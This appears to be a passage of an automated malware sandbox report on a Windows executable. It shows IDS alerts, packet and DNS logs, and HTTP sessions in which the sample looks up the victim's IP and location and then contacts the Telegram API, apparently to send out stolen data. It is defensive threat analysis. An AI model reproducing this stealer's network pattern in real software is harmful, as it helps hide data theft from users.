                                                                                                                InternalNameAPWe.exe
                                                                                                                LegalCopyrightCopyright 2022
                                                                                                                LegalTrademarks
                                                                                                                OriginalFilenameAPWe.exe
                                                                                                                ProductNameCompiler Project
                                                                                                                ProductVersion1.0.0.0
                                                                                                                Assembly Version1.0.0.0

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-03-07T23:22:14.902436+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949683132.226.247.7380TCP
                                                                                                                2025-03-07T23:22:17.668241+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949683132.226.247.7380TCP
                                                                                                                2025-03-07T23:22:20.018057+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949685104.21.96.1443TCP
                                                                                                                2025-03-07T23:22:20.793056+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949686132.226.247.7380TCP
                                                                                                                2025-03-07T23:22:23.366202+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949687104.21.96.1443TCP
                                                                                                                2025-03-07T23:22:24.152430+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949688132.226.247.7380TCP
                                                                                                                2025-03-07T23:22:35.729444+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949695104.21.96.1443TCP
                                                                                                                2025-03-07T23:22:44.328853+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949700149.154.167.220443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Mar 7, 2025 23:22:13.691193104 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:13.696249962 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:13.696335077 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:13.696510077 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:13.701541901 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.389657974 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.439013958 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:14.653702974 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:14.661578894 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.861619949 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.902436018 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:14.953311920 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:14.953373909 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.953474045 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:14.963022947 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:14.963041067 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:16.825005054 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:16.825069904 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:16.832195044 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:16.832210064 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:16.832561016 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:16.886828899 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:16.887118101 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:16.928381920 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.360570908 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.360631943 CET44349684104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.360764027 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:17.404346943 CET49684443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:17.407529116 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:17.412678003 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.618110895 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.621947050 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:17.621999979 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.622092962 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:17.622426033 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:17.622446060 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:17.668241024 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:19.512465954 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:19.514806986 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:19.514839888 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.018075943 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.018141985 CET44349685104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.018213987 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.020092964 CET49685443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.050070047 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:20.055290937 CET8049683132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.055449009 CET4968380192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:20.058182955 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:20.063159943 CET8049686132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.063254118 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:20.077133894 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:20.082329035 CET8049686132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.747411966 CET8049686132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.748645067 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.748754025 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.748871088 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.749103069 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:20.749140024 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:20.793056011 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:22.698744059 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:22.717120886 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:22.717156887 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366219044 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366286039 CET44349687104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.366468906 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:23.366934061 CET49687443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:23.370235920 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.371459007 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376426935 CET8049686132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.376492977 CET4968680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376624107 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:23.376703978 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.376799107 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:23.381804943 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.099194050 CET8049688132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.100833893 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.100876093 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.101002932 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.101238012 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:24.101249933 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:24.152430058 CET4968880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.110598087 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.112711906 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.112725973 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616740942 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616825104 CET44349689104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.616980076 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.617479086 CET49689443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:26.622037888 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.627150059 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:26.627248049 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.627370119 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:26.632487059 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.313730955 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.315298080 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315339088 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.315443039 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315707922 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:27.315726995 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:27.355616093 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.103163958 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.105252028 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.105279922 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617763996 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617822886 CET44349691104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.617913008 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.618490934 CET49691443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:29.621407986 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.622390985 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.626656055 CET8049690132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.626730919 CET4969080192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.627512932 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:29.627594948 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.627748966 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:29.632797956 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.329211950 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.330738068 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.330775976 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.330950975 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.331140995 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:30.331151962 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:30.371556997 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.110527039 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.112709999 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.112726927 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629187107 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629264116 CET44349693104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.629559040 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.629817963 CET49693443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:32.633152962 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.634377003 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.638446093 CET8049692132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.638514996 CET4969280192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.639444113 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:32.639508009 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.639667988 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:32.644870996 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.338531971 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.339919090 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.339979887 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.340049028 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.340353966 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:33.340373993 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:33.386790037 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.228488922 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.230576992 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.230609894 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.729443073 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.733230114 CET44349695104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.733359098 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.733848095 CET49695443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:35.736671925 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.737725973 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.741877079 CET8049694132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.742135048 CET4969480192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.742734909 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:35.742886066 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.743067980 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:35.748044968 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.444947958 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.446410894 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446453094 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.446554899 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446825981 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:36.446836948 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:36.496216059 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.169975042 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.171911955 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.171931028 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673763037 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673880100 CET44349697104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.673965931 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.674407005 CET49697443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:38.677532911 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.678845882 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.682780027 CET8049696132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.682856083 CET4969680192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.683873892 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:38.683947086 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.684065104 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:38.689075947 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.366400957 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.368201017 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368257999 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.368330002 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368592024 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:39.368607998 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:39.418226004 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.142988920 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.145026922 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.145051003 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.646987915 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.647049904 CET44349699104.21.96.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.647119045 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.647579908 CET49699443192.168.2.9104.21.96.1
                                                                                                                Mar 7, 2025 23:22:41.661726952 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.666973114 CET8049698132.226.247.73192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.667066097 CET4969880192.168.2.9132.226.247.73
                                                                                                                Mar 7, 2025 23:22:41.671466112 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.671499014 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.671683073 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.672135115 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:41.672146082 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.662491083 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.662622929 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.666152954 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.666160107 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.666366100 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:43.667959929 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:43.708353043 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328829050 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328887939 CET44349700149.154.167.220192.168.2.9
                                                                                                                Mar 7, 2025 23:22:44.328938961 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:44.333023071 CET49700443192.168.2.9149.154.167.220
                                                                                                                Mar 7, 2025 23:22:49.549422979 CET4968880192.168.2.9132.226.247.73

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Mar 7, 2025 23:22:13.676968098 CET5301853192.168.2.91.1.1.1
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET53530181.1.1.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:14.943376064 CET4975553192.168.2.91.1.1.1
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET53497551.1.1.1192.168.2.9
                                                                                                                Mar 7, 2025 23:22:41.662384987 CET5052353192.168.2.91.1.1.1
                                                                                                                Mar 7, 2025 23:22:41.670660019 CET53505231.1.1.1192.168.2.9

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Mar 7, 2025 23:22:13.676968098 CET192.168.2.91.1.1.10x37eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.943376064 CET192.168.2.91.1.1.10x9d84Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:41.662384987 CET192.168.2.91.1.1.10x8c45Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:13.684921026 CET1.1.1.1192.168.2.90x37eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:14.952323914 CET1.1.1.1192.168.2.90x9d84No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                Mar 7, 2025 23:22:41.670660019 CET1.1.1.1192.168.2.90x8c45No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949683132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Mar 7, 2025 23:22:13.696510077 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Mar 7, 2025 23:22:14.389657974 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Mar 7, 2025 23:22:14.653702974 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Mar 7, 2025 23:22:14.861619949 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Mar 7, 2025 23:22:17.407529116 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Mar 7, 2025 23:22:17.618110895 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 07 Mar 2025 22:22:17 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949686132.226.247.73807072C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                TimestampBytes transferredDirectionData
